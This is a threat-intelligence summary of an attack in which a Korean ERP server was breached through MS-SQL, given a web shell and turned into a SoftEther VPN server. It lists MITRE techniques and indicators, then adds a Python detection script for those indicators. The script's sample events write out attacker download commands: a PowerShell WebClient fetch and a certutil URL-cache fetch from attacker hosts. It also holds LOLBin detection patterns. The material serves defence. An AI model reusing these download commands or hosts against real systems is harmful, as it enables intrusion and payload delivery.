Analysis of SoftEther VPN Attack on Korean ERP Server

A Korean ERP server was compromised via a poorly secured MS-SQL service, leading to the installation of a web shell and, ultimately, a SoftEther VPN server on the infected host. The operation shows attacker use of system discovery commands, credential theft, and VPN-based C2 infrastructure, with multiple IOCs and download URLs. #SoftEtherVPN #MS-SQL #WebShell #GALLIUM #ToddyCat #UNC3500 #SystemBC #Bunitu #bashupload

Keypoints

  • Attack targeted a Korean company’s ERP server by exploiting an inadequately protected MS-SQL service to gain initial access.
  • The threat actor installed a web shell to maintain persistence and control over the infected system.
  • SoftEther VPN was installed on the compromised host to function as a VPN server, potentially forming a cascade VPN to reach other networks.
  • Early reconnaissance used commands such as ping, whoami, ipconfig, hostname, tasklist, and netstat to enumerate the environment.
  • Payloads were downloaded from remote URLs via PowerShell, Bitsadmin, and CertUtil, followed by a downloader batch that installs SoftEther VPN components.
  • Credential dumping activity was detected (Mimikatz reference), indicating attempts to harvest stored credentials.
  • IoCs include MD5 hashes, download URLs, a VPN C2 server IP, and a suspicious domain (bashupload.com).

MITRE Techniques

  • [T1190] Exploit Public-Facing Application – Initial infiltration occurred through attacking a poorly managed MS-SQL server (‘initial infiltration occurred through attacking a poorly managed MS-SQL server’).
  • [T1133] External Remote Services – The attacker installed SoftEther VPN to access the internal network from outside (‘utilize the infected system as a VPN server’).
  • [T1505.003] Web Shell – Web shell installed and used to execute commands on the server (‘The web shell was installed… logs of commands… were found’).
  • [T1105] Ingress Tool Transfer – Payloads downloaded from remote URLs using multiple tools (PowerShell, Bitsadmin, CertUtil).
  • [T1059.001] PowerShell – Downloads and executes payloads via PowerShell commands (‘powershell (new-object System.Net.WebClient).DownloadFile(…)’).
  • [T1036] Masquerading – The file vmtoolsd1.exe was initially believed to be legitimate because a Visual Studio Code download occurred in the same directory (‘believed to be a legitimate file…’).
  • [T1003] Credential Dumping – Credential theft indicated by Mimikatz-related credential access indicators.
  • [T1016] System Network Configuration Discovery – Discovery of system configuration via ipconfig (‘ipconfig’).
  • [T1049] System Network Connections Discovery – Discovery of network connections via netstat (‘netstat -ano -p tcp’).

Indicators of Compromise

  • [MD5] – aac76af38bfd374e83aef1326a9ea8ad, ef340716a83879736e486f331d84a7c6
  • [URL] – hxxp://45.77.44[.]127/vmtoolsd.exe, hxxp://167.99.75[.]170/vmtoolsd.exe, hxxps://bashupload[.]com/-nsU2/1.txt
  • [IP] – 45.76.53[.]110:443 (VPN server)
  • [Domain] – bashupload.com
  • [File] – vpn_server.config, hamcore.se2, tun02.bat
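The following added example (not code from the ASEC report or from this summary) shows how a defender could turn the behaviours in the keypoints and the indicators above into a detection pass over endpoint telemetry. It assumes Sysmon-style process-creation records reduced to a dict with ts, host, parent, cmdline and optional md5 and dest_ip fields; the events, hostnames and timestamps are constructed, the IoCs are the page's values refanged, and the burst threshold (three distinct discovery commands from a server process within five minutes) is an assumed tuning value. One of the page's MD5 values is attached to a constructed event purely to exercise the hash check; the page does not say which file it belongs to.

```python
"""Detection pass over constructed process-creation events using the IoCs and
behaviours described in the ASEC write-up summarised on this page (added example)."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# IoCs from the page, refanged so they match raw command lines / connection logs.
IOC_HASHES = {"aac76af38bfd374e83aef1326a9ea8ad", "ef340716a83879736e486f331d84a7c6"}
IOC_URLS = {"http://45.77.44.127/vmtoolsd.exe", "http://167.99.75.170/vmtoolsd.exe",
            "https://bashupload.com/-nsU2/1.txt"}
IOC_IPS = {"45.76.53.110"}            # VPN server
IOC_DOMAINS = {"bashupload.com"}
IOC_FILES = {"vpn_server.config", "hamcore.se2", "tun02.bat"}

# Discovery commands the report lists; a burst of these from a server process is the signal.
DISCOVERY_CMDS = {"ping", "whoami", "ipconfig", "hostname", "tasklist", "netstat"}
# Parents that should not normally spawn reconnaissance on an ERP / database host (assumption).
SUSPICIOUS_PARENTS = {"sqlservr.exe", "w3wp.exe"}

# Download-via-LOLBin patterns for the three tools named in the report.
DOWNLOAD_PATTERNS = {
    "powershell_webclient": re.compile(r"System\.Net\.WebClient\)\s*\.DownloadFile\(", re.I),
    "bitsadmin_transfer": re.compile(r"\bbitsadmin\b.*?/(?:transfer|download)\b", re.I),
    "certutil_urlcache": re.compile(r"\bcertutil\b.*?-urlcache\b", re.I),
}
URL_RE = re.compile(r"https?://[^\s'\"]+", re.I)

# Constructed sample telemetry (hypothetical hosts, times and file names).
SAMPLE_EVENTS = [
    {"ts": "2024-05-01T02:10:01", "host": "erp-01", "parent": "sqlservr.exe", "cmdline": "cmd.exe /c whoami"},
    {"ts": "2024-05-01T02:10:04", "host": "erp-01", "parent": "sqlservr.exe", "cmdline": "cmd.exe /c ipconfig"},
    {"ts": "2024-05-01T02:10:09", "host": "erp-01", "parent": "sqlservr.exe", "cmdline": "cmd.exe /c netstat -ano -p tcp"},
    {"ts": "2024-05-01T02:11:30", "host": "erp-01", "parent": "w3wp.exe",
     "cmdline": "powershell (new-object System.Net.WebClient).DownloadFile('http://45.77.44.127/vmtoolsd.exe','C:\\Windows\\Temp\\vmtoolsd.exe')"},
    {"ts": "2024-05-01T02:12:40", "host": "erp-01", "parent": "w3wp.exe",
     "cmdline": "certutil -urlcache -split -f https://bashupload.com/-nsU2/1.txt C:\\Windows\\Temp\\tun02.bat"},
    # Page MD5 attached to a constructed binary name; the page does not map hashes to files.
    {"ts": "2024-05-01T02:15:00", "host": "erp-01", "parent": "services.exe",
     "cmdline": "C:\\Windows\\Temp\\dropped.exe", "md5": "aac76af38bfd374e83aef1326a9ea8ad", "dest_ip": "45.76.53.110"},
    {"ts": "2024-05-01T09:00:00", "host": "hr-05", "parent": "explorer.exe", "cmdline": "ipconfig"},  # benign admin use
]


def match_iocs(event):
    """Return the set of IoC categories (hash, url, domain, ip, file) that hit for one event."""
    hits = set()
    cmd = event["cmdline"]
    if event.get("md5", "").lower() in IOC_HASHES:
        hits.add("hash")
    if event.get("dest_ip") in IOC_IPS:
        hits.add("ip")
    for url in URL_RE.findall(cmd):
        if url in IOC_URLS:
            hits.add("url")
        host = re.sub(r"^https?://", "", url, flags=re.I).split("/")[0]
        if host in IOC_DOMAINS:
            hits.add("domain")
        if host in IOC_IPS:
            hits.add("ip")
    if any(name in cmd.lower() for name in IOC_FILES):
        hits.add("file")
    return hits


def detect_download(cmdline):
    """Return the names of LOLBin download patterns matched by a command line."""
    return sorted(name for name, rx in DOWNLOAD_PATTERNS.items() if rx.search(cmdline))


def discovery_command(cmdline):
    """Return the discovery command name if the command line is one, else None."""
    stripped = re.sub(r"^\s*cmd(?:\.exe)?\s+/[ck]\s+", "", cmdline, flags=re.I)  # drop 'cmd /c' wrapper
    parts = stripped.split()
    token = parts[0].lower().rsplit("\\", 1)[-1].removesuffix(".exe") if parts else ""
    return token if token in DISCOVERY_CMDS else None


def find_discovery_bursts(events, window=timedelta(minutes=5), min_distinct=3):
    """Map host -> sorted discovery commands when a server process ran >= min_distinct
    different ones within `window` (the pattern seen on the ERP server)."""
    per_host = defaultdict(list)
    for ev in events:
        cmd = discovery_command(ev["cmdline"])
        if cmd and ev["parent"].lower() in SUSPICIOUS_PARENTS:
            per_host[ev["host"]].append((datetime.fromisoformat(ev["ts"]), cmd))
    bursts = {}
    for host, items in per_host.items():
        items.sort()
        for i, (t0, _) in enumerate(items):
            seen = {c for t, c in items[i:] if t - t0 <= window}
            if len(seen) >= min_distinct:
                bursts[host] = sorted(seen)
                break
    return bursts


def analyze(events):
    """Run the IoC, LOLBin-download and discovery-burst checks; return a list of findings."""
    findings = []
    for ev in events:
        iocs = match_iocs(ev)
        if iocs:
            findings.append({"host": ev["host"], "ts": ev["ts"], "type": "ioc", "detail": sorted(iocs)})
        dl = detect_download(ev["cmdline"])
        if dl:
            findings.append({"host": ev["host"], "ts": ev["ts"], "type": "lolbin_download", "detail": dl})
    for host, cmds in find_discovery_bursts(events).items():
        findings.append({"host": host, "ts": None, "type": "discovery_burst", "detail": cmds})
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f)
```

The three checks are deliberately independent: the hash, URL, IP and file matches expire as the actor rotates infrastructure, while the discovery-burst and LOLBin-download rules key on behaviour the report describes (reconnaissance spawned from sqlservr.exe or a web-shell host process, and downloads via PowerShell, Bitsadmin or CertUtil) and keep working after the listed indicators go stale. The benign hr-05 event shows why the burst rule is scoped to server parents rather than to the command names alone.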

Read more: https://asec.ahnlab.com/en/66843/